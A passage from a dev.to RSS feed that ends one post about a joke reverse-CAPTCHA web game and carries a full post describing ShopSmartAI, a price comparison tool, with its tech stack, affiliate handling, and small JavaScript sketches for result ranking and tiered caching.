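    prompt: 'Decode this byte: ' + bits,
    check: (answer) => Number(answer) === value,
  };
}
```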

&lt;p&gt;The whole thing is ~500 lines of JS with no external calls. It runs entirely client-side. Even the fake "2,847,293 attempts today" counter ticks up in real time to make it feel like thousands of humans are failing simultaneously alongside you.&lt;/p&gt;

&lt;p&gt;Fun details I'm proud of:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The pixel grid challenge has a nearly invisible crosshair at the target — just visible enough to taunt you&lt;/li&gt;
&lt;li&gt;Challenge order is shuffled each attempt so you can't memorize the sequence&lt;/li&gt;
&lt;li&gt;The robot SVG eyes blink and the antenna glows between cyan and green&lt;/li&gt;
&lt;li&gt;Share button copies a pre-written message of shame to your clipboard&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Prize Category
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Community Favorite&lt;/strong&gt; — Because nothing unites the internet like collective humiliation. Every human who tries this will fail, share their score, and challenge their friends to fail too. It's a universal experience: we're all equally inferior to machines. Together.&lt;/p&gt;

</description>
      <category>devchallenge</category>
      <category>418challenge</category>
      <category>showdev</category>
    </item>
    <item>
      <title>I Built an AI-Powered Price Comparison Tool That Searches 100+ Retailers Instantly</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Thu, 02 Apr 2026 18:17:17 +0000</pubDate>
      <link>https://dev.to/rkondoju/i-built-an-ai-powered-price-comparison-tool-that-searches-100-retailers-instantly-4492</link>
      <guid>https://dev.to/rkondoju/i-built-an-ai-powered-price-comparison-tool-that-searches-100-retailers-instantly-4492</guid>
      <description>&lt;p&gt;Have you ever spent 30 minutes opening tabs across Amazon, Best Buy, Walmart, and eBay just to find the best price on a laptop? I did too — so I built a tool to do it in seconds.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is ShopSmartAI?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://shopsmartai.org" rel="noopener noreferrer"&gt;ShopSmartAI&lt;/a&gt; is an AI-powered price comparison platform that searches 100+ retailers in real-time and shows you the best deals — for both the US and Canada.&lt;/p&gt;

&lt;p&gt;You can search in plain English like &lt;strong&gt;"gaming laptop under $800 with RTX"&lt;/strong&gt; and the AI understands exactly what you're looking for.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Tech Stack
&lt;/h2&gt;

&lt;p&gt;Here's what powers it:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Frontend:&lt;/strong&gt; Next.js 14 (App Router) on Vercel&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Backend:&lt;/strong&gt; Node.js/Express on Railway&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Database:&lt;/strong&gt; PostgreSQL with AI response caching (7-day TTL)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AI:&lt;/strong&gt; Gemini 2.5 Flash for natural language search and product spec generation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Search Data:&lt;/strong&gt; Google Shopping API via Serper.dev + Best Buy API&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Affiliate:&lt;/strong&gt; Amazon Associates, eBay Partner Network, and more&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Key Features
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;AI Natural Language Search&lt;/strong&gt;&lt;br&gt;
Instead of keyword matching, the AI interprets what you actually want. Search for "best noise cancelling headphones for flying" and it returns relevant results ranked by what matters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Side-by-Side Comparison&lt;/strong&gt;&lt;br&gt;
Add up to 4 products and get an AI-generated comparison with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Per-category winners (Display, Performance, Battery, etc.)&lt;/li&gt;
&lt;li&gt;AI-generated specs from real product data&lt;/li&gt;
&lt;li&gt;Price comparison across all available retailers&lt;/li&gt;
&lt;li&gt;An overall verdict on which product wins and why&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;US + Canada Auto-Detection&lt;/strong&gt;&lt;br&gt;
The site detects your location and shows prices in USD or CAD with the right retailers. Canadian users see Canadian stores and prices — no more converting currencies in your head.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Price Alerts (No Signup Required)&lt;/strong&gt;&lt;br&gt;
Want to know when a product drops to your target price? Just enter your email — no account needed. We check prices and email you when it drops.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AI-Powered Blog&lt;/strong&gt;&lt;br&gt;
An automated blog publishes deal roundups and product comparisons every few days, targeting real search queries people are looking for.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the AI Search Works
&lt;/h2&gt;

&lt;p&gt;When a user searches, here's what happens:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The AI parses the natural language query to extract intent, budget, and must-have features&lt;/li&gt;
&lt;li&gt;We search Google Shopping API with optimized queries&lt;/li&gt;
&lt;li&gt;Results are normalized across retailers (different sites format data differently)&lt;/li&gt;
&lt;li&gt;Products are ranked by relevance — actual products rank above accessories&lt;/li&gt;
&lt;li&gt;Affiliate links are applied automatically based on retailer and country&lt;/li&gt;
&lt;li&gt;Results are cached in PostgreSQL to reduce API costs&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The AI doesn't just match keywords — it understands that "gaming laptop under $800 with RTX" means you want a laptop (not a case), with an NVIDIA RTX GPU, priced below $800.&lt;/p&gt;
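&lt;p&gt;Step 4, ranking actual products above accessories, can be sketched like this (the keyword list is illustrative; the production ranker uses more signals than a binary score):&lt;/p&gt;

```javascript
// Sketch of the accessory-demotion step: results whose titles look
// like accessories score lower and sink to the bottom.
const ACCESSORY_WORDS = ['case', 'cover', 'charger', 'cable', 'sleeve'];

function rankResults(results) {
  const score = (r) => {
    const title = r.title.toLowerCase();
    const isAccessory = ACCESSORY_WORDS.some((w) => title.includes(w));
    return isAccessory ? 0 : 1;
  };
  // slice() so the input array is not mutated
  return results.slice().sort((a, b) => score(b) - score(a));
}
```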

&lt;h2&gt;
  
  
  Challenges I Faced
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Canadian Data is Different&lt;/strong&gt;&lt;br&gt;
Google Shopping returns base64-encoded images for Canadian results instead of URLs. I almost filtered these out as "broken" before realizing they're perfectly valid data URIs that render fine.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Affiliate Link Complexity&lt;/strong&gt;&lt;br&gt;
Each retailer has a different affiliate URL format. Amazon uses &lt;code&gt;tag=&lt;/code&gt;, eBay needs 5 different parameters (&lt;code&gt;mkevt&lt;/code&gt;, &lt;code&gt;mkcid&lt;/code&gt;, &lt;code&gt;mkrid&lt;/code&gt;, &lt;code&gt;campid&lt;/code&gt;, &lt;code&gt;toolid&lt;/code&gt;), and some retailers don't have affiliate programs at all. Building a universal affiliate tag system that handles all of these was a fun challenge.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Keeping Costs Low&lt;/strong&gt;&lt;br&gt;
AI API calls add up fast. I implemented a 3-tier caching strategy:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;In-memory cache (24-hour TTL) for instant hits&lt;/li&gt;
&lt;li&gt;PostgreSQL cache (7-day TTL) for persistent storage&lt;/li&gt;
&lt;li&gt;AI generation only when cache misses&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This cut our AI costs by ~90%.&lt;/p&gt;
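&lt;p&gt;The tiered lookup itself is simple (a sketch with the stores injected so it's easy to test; the real tiers are an in-process map and a PostgreSQL table):&lt;/p&gt;

```javascript
// Sketch of the tiered cache lookup: memory first, then a persistent
// store, then generation. An entry is { value, at } where "at" is the
// write timestamp; expiry is checked against each tier's TTL.
function makeTieredCache(db, generate, memTtlMs, dbTtlMs) {
  const mem = new Map();
  const isFresh = (entry, ttl, now) => {
    if (!entry) return false;
    return !(now - entry.at > ttl);
  };
  return function get(key, now = Date.now()) {
    const m = mem.get(key);
    if (isFresh(m, memTtlMs, now)) return m.value;
    const d = db.get(key);
    if (isFresh(d, dbTtlMs, now)) {
      mem.set(key, d); // promote back into memory
      return d.value;
    }
    const value = generate(key); // cache miss: pay for the AI call
    const entry = { value, at: now };
    mem.set(key, entry);
    db.set(key, entry);
    return value;
  };
}
```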

&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Chrome extension (built, pending Web Store approval) — compare prices on any shopping site&lt;/li&gt;
&lt;li&gt;More retailer integrations (Dell, HP, B&amp;amp;H Photo)&lt;/li&gt;
&lt;li&gt;Price history tracking with charts&lt;/li&gt;
&lt;li&gt;Mobile app&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Try It Out
&lt;/h2&gt;

&lt;p&gt;Check it out at &lt;a href="https://shopsmartai.org" rel="noopener noreferrer"&gt;shopsmartai.org&lt;/a&gt; — search for any product and see how it works. I'd love feedback from the dev community.&lt;/p&gt;

&lt;p&gt;If you're interested in the technical details of any specific part (the AI search pipeline, the caching strategy, the affiliate system, or the Next.js architecture), let me know in the comments and I'll do a deep dive.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Built with Next.js, Node.js, PostgreSQL, and Gemini AI. Deployed on Vercel + Railway.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>nextjs</category>
      <category>ai</category>
      <category>showdev</category>
    </item>
  </channel>
</rss>
